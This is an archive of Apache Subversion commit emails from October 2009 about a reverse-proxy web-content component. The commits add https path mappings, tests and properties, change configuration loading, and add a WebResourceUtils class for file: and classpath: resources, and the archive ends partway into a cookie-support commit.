2E256238889C; Tue, 6 Oct 2009 10:06:27 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r822185 - in /portals/applications/webcontent/trunk: webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/ webcontent-war/src/main/webapp/WEB-INF/conf/ Date: Tue, 06 Oct 2009 10:06:27 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: woonsan Date: Tue Oct 6 10:06:26 2009 New Revision: 822185 URL: http://svn.apache.org/viewvc?rev=822185&view=rev Log: APA-17: Adding configuration example of apache site for https Modified: portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestReverseProxyLinkRewritingParserAaptor.java portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties Modified: portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java?rev=822185&r1=822184&r2=822185&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java Tue Oct 6 10:06:26 2009 @@ -46,8 +46,10 @@ proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("localhost", "/localhost/", "http://www.localhost.com/", null)); proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("localhost1", "/localhost/path1/", "http://www.localhost.com/path1/", null)); proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("localhost2", "/localhost/path1/path2/", "http://www.localhost.com/path1/path2/", null)); + proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("apache0", "/apache/", "http://apache.org/", null)); proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("apache", "/*_apache/", "http://$1.apache.org/", null)); - proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("apache", "/*.google.*/", "http://$1.google.$2/", null)); + proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("secure_apache", "/secure/*_apache/", "https://$1.apache.org/", null)); + proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("google", "/*.google.*/", "http://$1.google.$2/", null)); pathMapperProvider = new DefaultHttpReverseProxyPathMapperProviderImpl(proxyPathMappers, rewriterControllerMap, rewriterRulesetMap); pathMapperProvider.setMaxMatchingPathPartCount(3); } @@ -68,12 +70,23 @@ assertEquals("http://www.apache.org/index.html", mapper.getRemoteURL("/www_apache/index.html")); assertEquals("/www_apache/index.html", mapper.getLocalPath("http://www.apache.org/index.html")); + mapper = pathMapperProvider.findMapper("/apache/index.html"); + assertEquals("apache0", mapper.getName()); + assertEquals("http://apache.org/index.html", mapper.getRemoteURL("/apache/index.html")); + mapper = pathMapperProvider.findMapper("/portals_apache/index.html"); assertEquals("apache:/portals_apache/", mapper.getName()); mapper = pathMapperProvider.findMapperByRemoteURL("http://portals.apache.org/index.html"); assertEquals("apache:/portals_apache/", mapper.getName()); assertEquals("http://portals.apache.org/index.html", mapper.getRemoteURL("/portals_apache/index.html")); assertEquals("/portals_apache/index.html", mapper.getLocalPath("http://portals.apache.org/index.html")); + + mapper = pathMapperProvider.findMapper("/secure/www_apache/index.html"); + assertEquals("secure_apache:/secure/www_apache/", mapper.getName()); + mapper = pathMapperProvider.findMapperByRemoteURL("https://blogs.apache.org/index.html"); + assertEquals("secure_apache:/secure/blogs_apache/", mapper.getName()); + assertEquals("https://blogs.apache.org/index.html", mapper.getRemoteURL("/secure/blogs_apache/index.html")); + assertEquals("/secure/blogs_apache/index.html", mapper.getLocalPath("https://blogs.apache.org/index.html")); } public void testProxyURLMappings() throws Exception @@ -84,6 +97,12 @@ mapper = pathMapperProvider.findMapperByRemoteURL("http://portals.apache.org/index.html"); assertEquals("/portals_apache/", mapper.getLocalBasePath()); + mapper = pathMapperProvider.findMapperByRemoteURL("https://www.apache.org/index.html"); + assertEquals("/secure/www_apache/", mapper.getLocalBasePath()); + + mapper = pathMapperProvider.findMapperByRemoteURL("https://blogs.apache.org/index.html"); + assertEquals("/secure/blogs_apache/", mapper.getLocalBasePath()); + mapper = pathMapperProvider.findMapperByRemoteURL("http://www.localhost.com/path1/path2/index.html"); assertEquals("/localhost/path1/path2/", mapper.getLocalBasePath()); Modified: portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestReverseProxyLinkRewritingParserAaptor.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestReverseProxyLinkRewritingParserAaptor.java?rev=822185&r1=822184&r2=822185&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestReverseProxyLinkRewritingParserAaptor.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestReverseProxyLinkRewritingParserAaptor.java Tue Oct 6 10:06:26 2009 @@ -57,22 +57,30 @@ "href=\"/docs/\">Docs</a> and <a href='/documents/'>Documents</a></p>\n" + "<p><a \n" + "href=\"http://www.localhost.com/manager/list\">Application Management</a></p>\n" + + "<p><a href=\"https://blogs.apache.org/index.html\">Apache Blogs</a></p>\n" + + "<p><a href=\"http://apache.org/index.html\">Apache Software Foundation</a></p>\n" + "</html>"; private HttpReverseProxyPathMapperProvider proxyPathMapperProvider; private HttpReverseProxyPathMapper apacheProxyPathMapper; + private HttpReverseProxyPathMapper apache0ProxyPathMapper; + private HttpReverseProxyPathMapper securedApacheProxyPathMapper; private HttpReverseProxyPathMapper localhostProxyPathMapper; @Override public void setUp() { apacheProxyPathMapper = new DefaultHttpReverseProxyPathMapperImpl("apache", "/*_apache/", "http://$1.apache.org/", null); + apache0ProxyPathMapper = new DefaultHttpReverseProxyPathMapperImpl("apache0", "/apache/", "http://apache.org/", null); + securedApacheProxyPathMapper = new DefaultHttpReverseProxyPathMapperImpl("secure_apache", "/secure/*_apache/", "https://$1.apache.org/", null); localhostProxyPathMapper = new DefaultHttpReverseProxyPathMapperImpl("localhost", "/localhost/", "http://www.localhost.com/", null); Map<HttpReverseProxyPathMapper, RewriterController> rewriterControllerMap = new HashMap<HttpReverseProxyPathMapper, RewriterController>(); Map<HttpReverseProxyPathMapper, Ruleset> rewriterRulesetMap = new HashMap<HttpReverseProxyPathMapper, Ruleset>(); List<HttpReverseProxyPathMapper> proxyPathMappers = new ArrayList<HttpReverseProxyPathMapper>(); proxyPathMappers.add(apacheProxyPathMapper); + proxyPathMappers.add(apache0ProxyPathMapper); + proxyPathMappers.add(securedApacheProxyPathMapper); proxyPathMappers.add(localhostProxyPathMapper); proxyPathMapperProvider = new DefaultHttpReverseProxyPathMapperProviderImpl(proxyPathMappers, rewriterControllerMap, rewriterRulesetMap); @@ -109,6 +117,8 @@ assertTrue("Wrong rewriting: " + lines.get(5), StringUtils.contains(lines.get(5), "href='/webcontent/rproxy/localhost/manager/start'")); assertTrue("Wrong rewriting: " + lines.get(7), StringUtils.contains(lines.get(7), "href=\"/webcontent/rproxy/www_apache/docs/\"")); assertTrue("Wrong rewriting: " + lines.get(9), StringUtils.contains(lines.get(9), "href=\"/webcontent/rproxy/localhost/manager/list\"")); + assertTrue("Wrong rewriting: " + lines.get(10), StringUtils.contains(lines.get(10), "href=\"/webcontent/rproxy/secure/blogs_apache/index.html\"")); + assertTrue("Wrong rewriting: " + lines.get(11), StringUtils.contains(lines.get(11), "href=\"/webcontent/rproxy/apache/index.html\"")); } } Modified: portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties?rev=822185&r1=822184&r2=822185&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties (original) +++ portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties Tue Oct 6 10:06:26 2009 @@ -68,7 +68,7 @@ # Proxy Pass Reverse Mapping configurations for each category # ... Put the path item names here. Each path item will be evaluated by the order. -proxy.reverse.pass = apache, localhost, somewhere +proxy.reverse.pass = apache, all_apache, secure_apache, all_secure_apache, localhost, somewhere # ... Set cache count of proxy path mappers which are dynamically created by glob style mappings. proxy.reverse.pass.dynamicProxyPathMapperCacheCount = 1000 # ... Set max matching path part count @@ -76,14 +76,38 @@ # ... Sets detail attributes for each path item. -proxy.reverse.pass.apache.local = /*_apache/ -proxy.reverse.pass.apache.remote = http://$1.apache.org/ +proxy.reverse.pass.apache.local = /apache/ +proxy.reverse.pass.apache.remote = http://apache.org/ proxy.reverse.pass.apache.rewriter.basic = org.apache.portals.applications.webcontent.rewriter.WebContentRewriter proxy.reverse.pass.apache.rewriter.parserAdaptor = html proxy.reverse.pass.apache.rewriter.parserAdaptor.html = org.apache.portals.applications.webcontent.proxy.impl.DefaultReverseProxyLinkRewritingParserAaptor proxy.reverse.pass.apache.rewriter.parserAdaptor.html.mimeType = text/html proxy.reverse.pass.apache.rewriter.parserAdaptor.html.property.lookUpAllMappings = true +proxy.reverse.pass.all_apache.local = /*_apache/ +proxy.reverse.pass.all_apache.remote = http://$1.apache.org/ +proxy.reverse.pass.all_apache.rewriter.basic = org.apache.portals.applications.webcontent.rewriter.WebContentRewriter +proxy.reverse.pass.all_apache.rewriter.parserAdaptor = html +proxy.reverse.pass.all_apache.rewriter.parserAdaptor.html = org.apache.portals.applications.webcontent.proxy.impl.DefaultReverseProxyLinkRewritingParserAaptor +proxy.reverse.pass.all_apache.rewriter.parserAdaptor.html.mimeType = text/html +proxy.reverse.pass.all_apache.rewriter.parserAdaptor.html.property.lookUpAllMappings = true + +proxy.reverse.pass.secure_apache.local = /secure/apache/ +proxy.reverse.pass.secure_apache.remote = https://apache.org/ +proxy.reverse.pass.secure_apache.rewriter.basic = org.apache.portals.applications.webcontent.rewriter.WebContentRewriter +proxy.reverse.pass.secure_apache.rewriter.parserAdaptor = html +proxy.reverse.pass.secure_apache.rewriter.parserAdaptor.html = org.apache.portals.applications.webcontent.proxy.impl.DefaultReverseProxyLinkRewritingParserAaptor +proxy.reverse.pass.secure_apache.rewriter.parserAdaptor.html.mimeType = text/html +proxy.reverse.pass.secure_apache.rewriter.parserAdaptor.html.property.lookUpAllMappings = true + +proxy.reverse.pass.all_secure_apache.local = /secure/*_apache/ +proxy.reverse.pass.all_secure_apache.remote = https://$1.apache.org/ +proxy.reverse.pass.all_secure_apache.rewriter.basic = org.apache.portals.applications.webcontent.rewriter.WebContentRewriter +proxy.reverse.pass.all_secure_apache.rewriter.parserAdaptor = html +proxy.reverse.pass.all_secure_apache.rewriter.parserAdaptor.html = org.apache.portals.applications.webcontent.proxy.impl.DefaultReverseProxyLinkRewritingParserAaptor +proxy.reverse.pass.all_secure_apache.rewriter.parserAdaptor.html.mimeType = text/html +proxy.reverse.pass.all_secure_apache.rewriter.parserAdaptor.html.property.lookUpAllMappings = true + proxy.reverse.pass.localhost.local = /localhost/ proxy.reverse.pass.localhost.remote = http://localhost:8080/ From [email protected] Tue Oct 06 13:17:28 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90318 invoked from network); 6 Oct 2009 13:17:28 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Oct 2009 13:17:28 -0000 Received: (qmail 23171 invoked by uid 500); 6 Oct 2009 13:17:28 -0000 Delivered-To: [email protected] Received: (qmail 23155 invoked by uid 500); 6 Oct 2009 13:17:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <portalapps-dev.portals.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 23145 invoked by uid 99); 6 Oct 2009 13:17:28 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Oct 2009 13:17:28 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Oct 2009 13:17:25 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 6D1F12388874; Tue, 6 Oct 2009 13:17:04 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r822261 - /portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java Date: Tue, 06 Oct 2009 13:17:04 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: woonsan Date: Tue Oct 6 13:17:03 2009 New Revision: 822261 URL: http://svn.apache.org/viewvc?rev=822261&view=rev Log: APA-17: Fixing configuration file loading problem when refresh option is off. Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java?rev=822261&r1=822260&r2=822261&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java Tue Oct 6 13:17:03 2009 @@ -62,7 +62,6 @@ import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyException; import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyNotFoundException; import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyPathMapper; -import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyPathMapperProvider; import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyService; import org.apache.portals.applications.webcontent.rewriter.MappingRewriterController; import org.apache.portals.applications.webcontent.rewriter.RewriterController; @@ -678,7 +677,7 @@ { configResourceFile = new File(getServletContext().getRealPath(configResourcePath)); } - catch (Exception e) + catch (Exception ignore) { } @@ -686,15 +685,20 @@ try { - if (configResourceFile != null && configResourceFile.isFile() && configReloadingStrategy != null) + configuration = new PropertiesConfiguration(); + + if (configResourceFile != null && configResourceFile.isFile()) { - configuration = new PropertiesConfiguration(configResourceFile); - configuration.setReloadingStrategy(configReloadingStrategy); + configuration.load(configResourceFile); + + if (configReloadingStrategy != null) + { + configuration.setReloadingStrategy(configReloadingStrategy); + } } else { configInput = getServletContext().getResourceAsStream(configResourcePath); - configuration = new PropertiesConfiguration(); ((PropertiesConfiguration) configuration).load(configInput); } } From [email protected] Tue Oct 06 16:58:08 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74252 invoked from network); 6 Oct 2009 16:58:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Oct 2009 16:58:08 -0000 Received: (qmail 90282 invoked by uid 500); 6 Oct 2009 16:58:08 -0000 Delivered-To: [email protected] Received: (qmail 90258 invoked by uid 500); 6 Oct 2009 16:58:08 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <portalapps-dev.portals.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 90246 invoked by uid 99); 6 Oct 2009 16:58:08 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Oct 2009 16:58:08 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Oct 2009 16:58:04 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 65FEA23888E3; Tue, 6 Oct 2009 16:57:43 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r822346 - in /portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent: proxy/impl/DefaultHttpReverseProxyServlet.java util/WebResourceUtils.java Date: Tue, 06 Oct 2009 16:57:43 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: woonsan Date: Tue Oct 6 16:57:42 2009 New Revision: 822346 URL: http://svn.apache.org/viewvc?rev=822346&view=rev Log: APA-17: Allows file: or classpath: prefixed file configurations Added: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/WebResourceUtils.java (with props) Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java?rev=822346&r1=822345&r2=822346&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java Tue Oct 6 16:57:42 2009 @@ -66,6 +66,7 @@ import org.apache.portals.applications.webcontent.rewriter.MappingRewriterController; import org.apache.portals.applications.webcontent.rewriter.RewriterController; import org.apache.portals.applications.webcontent.rewriter.rules.Ruleset; +import org.apache.portals.applications.webcontent.util.WebResourceUtils; import org.slf4j.Logger; import org.slf4j.LoggerFactory; @@ -394,7 +395,15 @@ if (!StringUtils.isBlank(ruleMappings)) { - ruleMappingsFilePath = getServletContext().getRealPath(ruleMappings); + File ruleMappingsFile = + WebResourceUtils.getResourceAsFile(ruleMappings, + Thread.currentThread().getContextClassLoader(), + getServletContext()); + + if (ruleMappingsFile != null && ruleMappingsFile.isFile()) + { + ruleMappingsFilePath = ruleMappingsFile.getCanonicalPath(); + } } Configuration basicRewriterConf = rewriterConf.subset("basic"); @@ -467,9 +476,10 @@ } } - MappingRewriterController rewriterController = new MappingRewriterController(ruleMappingsFilePath, - basicRewriterClass, ruleBasedRewriterClass, - adaptorMimeTypeClassMap); + MappingRewriterController rewriterController = + new MappingRewriterController(ruleMappingsFilePath, + basicRewriterClass, ruleBasedRewriterClass, + adaptorMimeTypeClassMap); rewriterController.setBasicRewriterProps(basicRewriterProps); rewriterController.setRulesetRewriterProps(basicRewriterProps); @@ -664,22 +674,15 @@ private void loadConfiguration() throws ServletException { - String configResourcePath = getServletConfig().getInitParameter("reverseproxy.configuration"); + String configResourcePath = StringUtils.trim(getServletConfig().getInitParameter("reverseproxy.configuration")); if (configResourcePath == null) { configResourcePath = "/WEB-INF/conf/reverseproxy.properties"; } - File configResourceFile = null; - - try - { - configResourceFile = new File(getServletContext().getRealPath(configResourcePath)); - } - catch (Exception ignore) - { - } + File configResourceFile = + WebResourceUtils.getResourceAsFile(configResourcePath, Thread.currentThread().getContextClassLoader(), getServletContext()); InputStream configInput = null; @@ -687,7 +690,7 @@ { configuration = new PropertiesConfiguration(); - if (configResourceFile != null && configResourceFile.isFile()) + if (configResourceFile != null) { configuration.load(configResourceFile); @@ -698,8 +701,8 @@ } else { - configInput = getServletContext().getResourceAsStream(configResourcePath); - ((PropertiesConfiguration) configuration).load(configInput); + configInput = WebResourceUtils.getResourceAsStream(configResourcePath.substring(10)); + configuration.load(configInput); } } catch (Exception e) @@ -744,7 +747,7 @@ } } - private Ruleset loadRewriterRuleset(RewriterController rewriterController, String rulesConfResourcePath) + private Ruleset loadRewriterRuleset(RewriterController rewriterController, String rulesConfResourcePath) throws IOException { Ruleset ruleset = null; @@ -755,7 +758,7 @@ { if (rewriterController != null && !StringUtils.isBlank(rulesConfResourcePath)) { - is = getServletContext().getResourceAsStream(rulesConfResourcePath); + is = WebResourceUtils.getResourceAsStream(rulesConfResourcePath, Thread.currentThread().getContextClassLoader(), getServletContext()); bis = new BufferedInputStream(is); ruleset = rewriterController.loadRuleset(bis); } Added: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/WebResourceUtils.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/WebResourceUtils.java?rev=822346&view=auto ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/WebResourceUtils.java (added) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/WebResourceUtils.java Tue Oct 6 16:57:42 2009 @@ -0,0 +1,135 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package org.apache.portals.applications.webcontent.util; + +import java.io.File; +import java.io.FileInputStream; +import java.io.IOException; +import java.io.InputStream; +import java.net.URI; +import java.net.URL; + +import javax.servlet.ServletContext; + +import org.apache.commons.lang.StringUtils; + +/** + * WebResourceUtils + * + * @version $Id$ + */ +public class WebResourceUtils +{ + + private WebResourceUtils() + { + } + + public static File getResourceAsFile(String resourcePath) + { + return getResourceAsFile(resourcePath, null, null); + } + + public static File getResourceAsFile(String resourcePath, ClassLoader classloader) + { + return getResourceAsFile(resourcePath, classloader, null); + } + + public static File getResourceAsFile(String resourcePath, ServletContext servletContext) + { + return getResourceAsFile(resourcePath, null, servletContext); + } + + public static File getResourceAsFile(String resourcePath, ClassLoader classloader, ServletContext servletContext) + { + if (resourcePath == null) + { + return null; + } + + try + { + if (StringUtils.startsWith(resourcePath, "file:")) + { + return new File(URI.create(resourcePath)); + } + else if (classloader != null && StringUtils.startsWith(resourcePath, "classpath:")) + { + URL resourceURL = classloader.getResource(resourcePath.substring(10)); + + if (resourceURL != null && "file".equals(resourceURL.getProtocol())) + { + return new File(resourceURL.toURI()); + } + } + else if (servletContext != null) + { + return new File(servletContext.getRealPath(resourcePath)); + } + else + { + return new File(resourcePath); + } + } + catch (Exception ignore) + { + } + + return null; + } + + public static InputStream getResourceAsStream(String resourcePath) throws IOException + { + return getResourceAsStream(resourcePath, null, null); + } + + public static InputStream getResourceAsStream(String resourcePath, ClassLoader classloader) throws IOException + { + return getResourceAsStream(resourcePath, classloader, null); + } + + public static InputStream getResourceAsStream(String resourcePath, ServletContext servletContext) throws IOException + { + return getResourceAsStream(resourcePath, null, servletContext); + } + + public static InputStream getResourceAsStream(String resourcePath, ClassLoader classloader, ServletContext servletContext) throws IOException + { + if (resourcePath == null) + { + return null; + } + + if (StringUtils.startsWith(resourcePath, "file:")) + { + return new FileInputStream(new File(URI.create(resourcePath))); + } + else if (classloader != null && StringUtils.startsWith(resourcePath, "classpath:")) + { + return classloader.getResourceAsStream(resourcePath.substring(10)); + } + else if (servletContext != null) + { + return servletContext.getResourceAsStream(resourcePath); + } + else + { + return new FileInputStream(resourcePath); + } + } + +} Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/WebResourceUtils.java ------------------------------------------------------------------------------ svn:eol-style = native Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/WebResourceUtils.java ------------------------------------------------------------------------------ svn:keywords = Id Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/WebResourceUtils.java ------------------------------------------------------------------------------ svn:mime-type = text/plain From [email protected] Wed Oct 07 09:20:11 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 58342 invoked from network); 7 Oct 2009 09:20:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Oct 2009 09:20:11 -0000 Received: (qmail 61027 invoked by uid 500); 7 Oct 2009 09:20:11 -0000 Delivered-To: [email protected] Received: (qmail 61005 invoked by uid 500); 7 Oct 2009 09:20:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <portalapps-dev.portals.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 60995 invoked by uid 99); 7 Oct 2009 09:20:10 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Oct 2009 09:20:10 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Oct 2009 09:19:59 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id F037D2388874; Wed, 7 Oct 2009 09:19:37 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r822629 - in /portals/applications/webcontent/trunk: webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/ webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/ webcontent-jar/src/main/... Date: Wed, 07 Oct 2009 09:19:37 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: woonsan Date: Wed Oct 7 09:19:36 2009 New Revision: 822629 URL: http://svn.apache.org/viewvc?rev=822629&view=rev Log: APA-17: Adding default cookies support for remote targets. Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapper.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperImpl.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperProviderImpl.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/WebResourceUtils.java portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestReverseProxyLinkRewritingParserAaptor.java portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapper.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapper.java?rev=822629&r1=822628&r2=822629&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapper.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapper.java Wed Oct 7 09:19:36 2009 @@ -67,4 +67,10 @@ */ public Map<String, String> getDefaultRequestHeaders(); + /** + * Returns default request cookies to the remote URL target. + * @return + */ + public Map<String, String> getDefaultRequestCookies(); + } \ No newline at end of file Modified: 